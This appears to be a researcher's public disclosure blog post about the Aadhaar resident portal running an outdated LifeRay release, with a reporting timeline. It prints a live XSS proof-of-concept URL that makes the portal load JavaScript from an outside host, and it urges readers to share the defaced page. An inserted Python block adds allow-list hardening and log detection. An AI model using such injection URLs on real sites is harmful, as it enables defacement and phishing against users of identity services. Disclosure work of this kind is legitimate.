Abhay Rana aka Nemo

Aadhaar Vulnerability Public Disclosure

The Vulnerability

The UIDAI Resident Portal (which has read access to the entire Aadhaar demographic data) is running a vulnerable version of LifeRay software: LifeRay 6.1, which was declared End-of-Life in February 2016.

This release includes multiple known vulnerabilities, including:

  1. An XSS issue, for which a PoC can be found at resident.uidai.gov.in (picture credits: @sanitarypanels)
  2. Multiple RCEs: see issue-62 for example.

In fact, the release is so old that it does not even appear on the “Known Vulnerabilities” page on the LifeRay website; you have to look at their Archived Vulnerabilities instead.

The PoC

You can find a simple Proof of Concept for the XSS issue at resident.uidai.gov.in.

The cdn_host parameter causes JavaScript to be loaded from $CDN_HOST/Resident-theme/js/custom.js, in this case https://scan.bb8.fun/Resident-theme/js/custom.js, which hosts a small snippet that overwrites the HTML of the page.
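As an added illustration (not code from this post, and not LifeRay's own implementation), here is how a theme loader could honour a cdn_host override only for an allow-listed origin, together with a small detector that flags requests carrying any other cdn_host value. The allowlist, the log lines and the function names are constructed assumptions.

```python
"""Added example: hardened handling of a theme-asset "cdn_host" query
parameter, plus a detector for requests that try to abuse it."""
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist (hypothetical, not UIDAI's real configuration):
# the only origins the theme is permitted to load custom.js from.
DEFAULT_ORIGIN = "https://resident.uidai.gov.in"
ALLOWED_CDN_ORIGINS = {DEFAULT_ORIGIN}
THEME_JS_PATH = "/Resident-theme/js/custom.js"


def allowed_cdn_origin(cdn_host_param: str):
    """Return the canonical origin if it is allow-listed, otherwise None.

    Only an exact https origin passes: scheme-relative values (//host),
    values carrying a path, query, userinfo (trusted-host@evil) or a
    look-alike host (trusted-host.evil) are all rejected.
    """
    parts = urlsplit(cdn_host_param)
    origin = f"{parts.scheme}://{parts.netloc}".lower()
    if (parts.scheme == "https" and parts.path in ("", "/")
            and not parts.query and origin in ALLOWED_CDN_ORIGINS):
        return origin
    return None


def resolve_cdn_host(cdn_host_param: str) -> str:
    """The vulnerable loader trusts the parameter as-is; this one falls
    back to the default origin unless the override is allow-listed."""
    if not cdn_host_param:
        return DEFAULT_ORIGIN
    return allowed_cdn_origin(cdn_host_param) or DEFAULT_ORIGIN


def theme_script_url(request_url: str) -> str:
    """Build the custom.js URL the way a hardened theme loader would."""
    query = parse_qs(urlsplit(request_url).query)
    return resolve_cdn_host(query.get("cdn_host", [""])[0]) + THEME_JS_PATH


def suspicious_cdn_host_requests(log_lines):
    """Flag (client_ip, cdn_host) pairs from access-log lines in the
    common/combined format whose cdn_host is not allow-listed."""
    hits = []
    for line in log_lines:
        try:
            request_target = line.split('"')[1].split()[1]  # "GET <target> HTTP/1.1"
        except IndexError:
            continue  # not a request line we understand
        for value in parse_qs(urlsplit(request_target).query).get("cdn_host", []):
            if allowed_cdn_origin(value) is None:
                hits.append((line.split()[0], value))
    return hits


# Constructed access-log sample; IPs are documentation ranges.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [15/Sep/2018:10:01:02 +0530] "GET /?cdn_host=https://scan.bb8.fun&tweet=13footwall/status/979301578686345216 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [15/Sep/2018:10:01:05 +0530] "GET /Resident-theme/js/custom.js HTTP/1.1" 200 812',
    '192.0.2.7 - - [15/Sep/2018:10:02:11 +0530] "GET /?cdn_host=//scan.bb8.fun HTTP/1.1" 200 5120',
    '192.0.2.8 - - [15/Sep/2018:10:03:00 +0530] "GET /?cdn_host=https://resident.uidai.gov.in/ HTTP/1.1" 200 5120',
]
```

Running `suspicious_cdn_host_requests(SAMPLE_ACCESS_LOG)` over the sample flags the two requests pointing the theme at scan.bb8.fun and ignores the one naming the portal's own origin.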

It shows up like:

Fun

The current script allows embedding any tweet via a tweet parameter. To embed one:

Go to any tweet, copy the part of its URL after twitter.com and pass it as the tweet parameter. For example, to embed this tweet:

  1. Look at the URL: https://twitter.com/13footwall/status/979301578686345216
  2. Copy 13footwall/status/979301578686345216 and pass it as the tweet parameter.
  3. The URL becomes https://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&tweet=13footwall/status/979301578686345216
  4. SHARE IT

The Report

I initially reported this to help@uidai.gov.in in Jan 2017:

Forgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:

Update

There is some confusion regarding which version of LifeRay UIDAI is running. They seem to be running 6.1.1, released on 2013-02-26.

The exact version is not relevant to the fact that UIDAI is:

  • running an unsupported release
  • which is 5 years old
  • not updating it despite being notified multiple times

0800 16-Sep: UIDAI seems to have patched the issue by blocking the cdn_host parameter. This still leaves them exposed to multiple other known vulnerabilities until they update to a supported release.

Timeline

The vulnerability is still not fixed. Here is a complete timeline:

Date         | What?
16 Jan 2017  | Initially reported to help@uidai.gov.in. No response.
21 Jan 2018  | Reported to ceo@uidai.gov.in and info@cert-in.org.in. No response.
19 Feb 2018  | Reminder sent to ceo@uidai.gov.in and info@cert-in.org.in.
19 Feb 2018  | Acknowledgement from CERT.
15 Mar 2018  | Reminder sent. No response.
17 Mar 2018  | Notified NCIIPC.
18 Mar 2018  | Confirmation from NCIIPC asking for more details. I replied with a quote of the previous exchange.
19 Mar 2018  | Confirmation from NCIIPC thanking me for the report.
19 Apr 2018  | Reminder sent to UIDAI asking for acknowledgement.
30 May 2018  | Reminder sent to NCIIPC and CERT asking for updates.

The only change that I’m aware of since my initial report is that the website stopped declaring the LifeRay version in an HTTP response header.

Published on September 15, 2018 in aadhaar, disclosure, sanitarypanels, 13ftwalls